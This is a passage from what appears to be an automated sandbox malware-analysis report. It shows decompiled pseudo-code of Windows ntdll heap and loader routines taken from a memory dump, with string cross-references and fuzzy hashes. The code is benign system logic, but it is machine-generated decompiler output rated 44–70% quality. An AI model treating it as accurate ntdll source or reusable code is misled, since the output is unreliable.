						E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011BB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E011BB150(", passed to %s", _t29);
					}
					_push("\n");
					E011BB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x12a6378 = 1;
						asm("int3");
						 *0x12a6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x011b40e6
0x011b40e8
0x011b40f1
0x0121042d
0x0121044c
0x01210451
0x0121042f
0x01210444
0x01210449
0x0121045d
0x01210466
0x0121046e
0x01210474
0x01210475
0x0121047a
0x0121048a
0x0121048c
0x01210493
0x01210494
0x01210494
0x00000000
0x0121049b
0x00000000

Strings

Invalid heap signature for heap at %p, xrefs: 01210458
, passed to %s, xrefs: 01210469
RtlAllocateHeap, xrefs: 01210468
HEAP[%wZ]: , xrefs: 0121043F
HEAP: , xrefs: 0121044C

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 4dabf4ccae445eb0e2e6b40dbb5589aaf2ac4a07031358ffaec4b2c0ceba96d6
Instruction ID: 27d8cf2c8fa9d217326d5b60f612e073ed121669149188885350e55e4f1fcfe7
Opcode Fuzzy Hash: 4dabf4ccae445eb0e2e6b40dbb5589aaf2ac4a07031358ffaec4b2c0ceba96d6
Instruction Fuzzy Hash: 6B0128322542419ED32DD769F48DF9277E8DB10F34F1D802DF10547A818BE89480C229

Uniqueness

Uniqueness Score: -1.00%

Function 011DA830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E011DA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x12a8748 - 1;
					if( *0x12a8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E011BB150();
									_t260 = _t257 + 4;
								} else {
									E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E011BB150();
								_t257 = _t260 + 4;
								__eflags =  *0x12a7bc8;
								if(__eflags == 0) {
									E01272073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0127A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0120D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E011DAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0127A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0127A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x12a8748 - 1;
					if( *0x12a8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E011BB150();
							} else {
								E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E011BB150();
							__eflags =  *0x12a7bc8;
							if(__eflags == 0) {
								_t131 = E01272073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x011da83a
0x011da83c
0x011da83e
0x011da841
0x011da844
0x011da84a
0x011daa53
0x011daa59
0x011daa59
0x011da858
0x011da85e
0x011daaf5
0x011daafc
0x0122229e
0x012222a2
0x012222a8
0x012222b3
0x012222b5
0x012222bb
0x012222c1
0x012222c5
0x012222e6
0x012222eb
0x012222f0
0x012222c7
0x012222dc
0x012222e1
0x012222e1
0x012222f3
0x012222f8
0x012222fd
0x01222300
0x01222307
0x0122230e
0x0122230e
0x01222313
0x01222313
0x012222b5
0x012222a2
0x011daafc
0x011da864
0x011da869
0x011daa5c
0x011daa5e
0x011da86f
0x011da87f
0x011da885
0x011da885
0x011da88b
0x011da890
0x011da896
0x011dab0c
0x011dab0f
0x011dab15
0x01222320
0x01222320
0x011dab1b
0x011da89c
0x011da89f
0x011da8a2
0x011da8a2
0x011da8a5
0x011da8af
0x011da8b3
0x011da8b8
0x011daa66
0x011da8be
0x011da8c5
0x011da8c6
0x011da8ce
0x01222328
0x01222332
0x01222337
0x01222337
0x011da8ce
0x011da8d4
0x011da8d8
0x011da8db
0x011da8de
0x011da8e1
0x011da8e5
0x011da8e8
0x011da8f0
0x011da8f3
0x0122234c
0x01222350
0x01222355
0x01222359
0x01222359
0x011da8f9
0x011da901
0x011daae4
0x011daae4
0x011daaea
0x00000000
0x011da907
0x011da90a
0x011da91d
0x011da91d
0x00000000
0x011da910
0x011da910
0x011da910
0x011da914
0x011da924
0x011da924
0x011da924
0x011da924
0x011da916
0x011da91b
0x00000000
0x00000000
0x00000000
0x011da91b
0x011da925
0x011da925
0x011da932
0x011da936
0x011da93c
0x011da93c
0x011da93c
0x011dab22
0x011dab24
0x011dab27
0x011dab27
0x011da942
0x011da944
0x011daaba
0x011daabd
0x011daac0
0x011daac0
0x011daac2
0x011dab2f
0x011daac4
0x011daac4
0x011daac7
0x011daaca
0x011daacc
0x011daace
0x011daace
0x011daace
0x011daad1
0x011daad1
0x011daad7
0x011daad9
0x00000000
0x00000000
0x01222361
0x01222369
0x0122236b
0x00000000
0x01222371
0x00000000
0x01222371
0x00000000
0x0122236b
0x011daac0
0x011da94a
0x011da94a
0x011da94d
0x011da94d
0x011da950
0x011da954
0x01222376
0x01222380
0x011da95a
0x011da95a
0x011da95c
0x011da95f
0x011da961
0x011da961
0x011da967
0x011da96a
0x011da972
0x011daa02
0x011daa06
0x011daa10
0x011daa16
0x011daa16
0x011daa1b
0x011daa21
0x011daa24
0x011daa27
0x011daa29
0x011daa2c
0x011daa32
0x00000000
0x00000000
0x00000000
0x00000000
0x011da978
0x011da978
0x011da97b
0x011da981
0x011da996
0x011da998
0x011da99f
0x011da9a2
0x0122238a
0x011da9a8
0x011da9a8
0x011da9a8
0x011da9aa
0x011da9ad
0x011da9b0
0x011da9bb
0x011da9be
0x011da9c7
0x011da9c9
0x011da9c9
0x011da9cc
0x011da9d1
0x011daa6d
0x011daa70
0x011daa73
0x011daa75
0x011daa79
0x011daa7e
0x011daa82
0x011daa8f
0x011daa94
0x011daa96
0x01222392
0x012223a1
0x012223a1
0x011daa9c
0x011daa9f
0x011daaa2
0x011daaa2
0x011daaa8
0x011daaab
0x011daaaf
0x00000000
0x011daab5
0x00000000
0x011daab5
0x011da9d7
0x011da9d7
0x011da9da
0x011da9e0
0x011da9e3
0x011da9e6
0x011da9e9
0x011da9eb
0x011da9fd
0x011da9fd
0x00000000
0x011da9eb
0x00000000
0x00000000
0x00000000
0x011da983
0x011da983
0x011da983
0x011da987
0x011da995
0x011da995
0x011da995
0x011da995
0x011da989
0x011da98e
0x00000000
0x011da990
0x00000000
0x011da990
0x011da98e
0x00000000
0x011da983
0x011da972
0x011da90a
0x011daa34
0x011daa34
0x011daa40
0x011daa43
0x011daa46
0x011daa4d
0x012223ab
0x012223b2
0x012223b8
0x012223be
0x012223c3
0x012223c5
0x012223cb
0x012223d1
0x012223d5
0x012223f6
0x012223fb
0x012223d7
0x012223ec
0x012223f1
0x01222403
0x01222408
0x01222410
0x01222417
0x01222422
0x01222422
0x01222417
0x012223c5
0x012223b2
0x00000000

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 012222F3
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01222403
HEAP[%wZ]: , xrefs: 012222D7, 012223E7
HEAP: , xrefs: 012222E6, 012223F6

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 0a2f29202dd0a17f0c6cc38192dca0b6b8d602d661be767fc2491ab25faf8a82
Instruction ID: ec7f9228b0f3028e49d645fc488de87b4970f2256a54f31a924d1a92cdd97e9d
Opcode Fuzzy Hash: 0a2f29202dd0a17f0c6cc38192dca0b6b8d602d661be767fc2491ab25faf8a82
Instruction Fuzzy Hash: CCD1CC34A00246DFDB1DCF68D490BBABBF1FF48300F198669D99A9B742E335A941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 011DA229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E011DA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E011DDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E011F9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0127A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E011F9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E011BB150();
					} else {
						E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E011BB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E011D7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0127138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E011D7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E011D7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01271582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E011D7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E011D7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01271582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0120D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x011da229
0x011da231
0x011da23f
0x011da242
0x011da244
0x011da24c
0x011da255
0x011da25a
0x011da25f
0x01221c76
0x01221c78
0x01221c7e
0x01221c7f
0x01221c81
0x01221c82
0x01221c84
0x01221c89
0x01221c8b
0x01221c9e
0x01221c9e
0x01221cab
0x01221cb2
0x00000000
0x01221cb2
0x01221c8d
0x01221c92
0x00000000
0x00000000
0x01221c94
0x01221c98
0x00000000
0x00000000
0x00000000
0x01221c98
0x011da265
0x011da265
0x011da266
0x011da26f
0x011da270
0x011da276
0x011da277
0x011da279
0x011da27e
0x011da282
0x01221db5
0x01221dbb
0x01221dc1
0x01221dc5
0x01221de4
0x01221de9
0x01221dc7
0x01221ddc
0x01221de1
0x01221def
0x01221df3
0x01221df7
0x01221dfe
0x01221e06
0x011da302
0x011da308
0x011da308
0x011da288
0x011da28d
0x011da294
0x01221cc1
0x011da29a
0x011da29a
0x011da29a
0x011da29f
0x01221ccb
0x01221cd1
0x01221cd8
0x01221cea
0x01221cea
0x01221cd8
0x011da2a9
0x011da2af
0x011da2bc
0x01221cfd
0x011da2c2
0x011da2c2
0x011da2c2
0x011da2c7
0x01221d07
0x01221d0d
0x01221d14
0x01221d1f
0x01221d21
0x01221d2c
0x01221d2c
0x01221d2c
0x01221d47
0x01221d47
0x01221d14
0x011da2cd
0x011da2d2
0x011da2d9
0x01221d5a
0x011da2df
0x011da2df
0x011da2df
0x011da2e4
0x01221d69
0x01221d6b
0x01221d76
0x01221d76
0x01221d76
0x01221d91
0x01221d91
0x011da2ea
0x011da2f0
0x011da2f5
0x01221da8
0x01221dad
0x01221dad
0x011da2fd
0x011da300
0x00000000

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01221DF9
`, xrefs: 01221C8D
HEAP[%wZ]: , xrefs: 01221DD7
HEAP: , xrefs: 01221DE4

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: f218e0e31ebbf1f5f83d6f1fdbb2a5ea5562ca93d077c186f6341cd268f43790
Instruction ID: 6e2b95db6eb62ad6bdd73f5ef0c2541f20509d9d890c7d12aec7fc14059ec033
Opcode Fuzzy Hash: f218e0e31ebbf1f5f83d6f1fdbb2a5ea5562ca93d077c186f6341cd268f43790
Instruction Fuzzy Hash: D7513832214691AFD72AEB69D845F7B7BE8FF80B54F090468F651CB291D734E900CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011E8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E011E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x12ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x12a8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x12a5780 & 0x00000003) != 0) {
							E01235510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x12a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E011FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x12a7984; // 0xd52b38
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x12a8464; // 0x73b80110
					 *0x12ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E011E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x12a5780 & 0x00000005) != 0) {
						_push(_t49);
						E01235510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x011e8e0f
0x011e8e16
0x011e8e19
0x011e8e1b
0x011e8e21
0x011e8e7f
0x011e8e85
0x01229354
0x0122936c
0x01229371
0x0122937b
0x01229381
0x01229381
0x0122937b
0x011e8e9d
0x011e8e9d
0x011e8e29
0x011e8e2c
0x011e8e38
0x011e8e3e
0x011e8e43
0x011e8eb5
0x011e8eb9
0x012292aa
0x012292af
0x012292e8
0x012292e8
0x012292af
0x011e8eb9
0x011e8e45
0x011e8e53
0x011e8e5b
0x011e8e5f
0x011e8e78
0x011e8e78
0x011e8e7d
0x011e8ec3
0x011e8ecd
0x011e8ed2
0x011e8ed2
0x011e8ec5
0x011e8ec5
0x00000000
0x011e8e7d
0x011e8e67
0x011e8ea4
0x0122931a
0x00000000
0x00000000
0x01229320
0x011e8ea4
0x011e8e70
0x01229325
0x01229340
0x01229345
0x01229345
0x011e8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0122933B, 01229367
LdrpFindDllActivationContext, xrefs: 01229331, 0122935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01229357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0122932A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
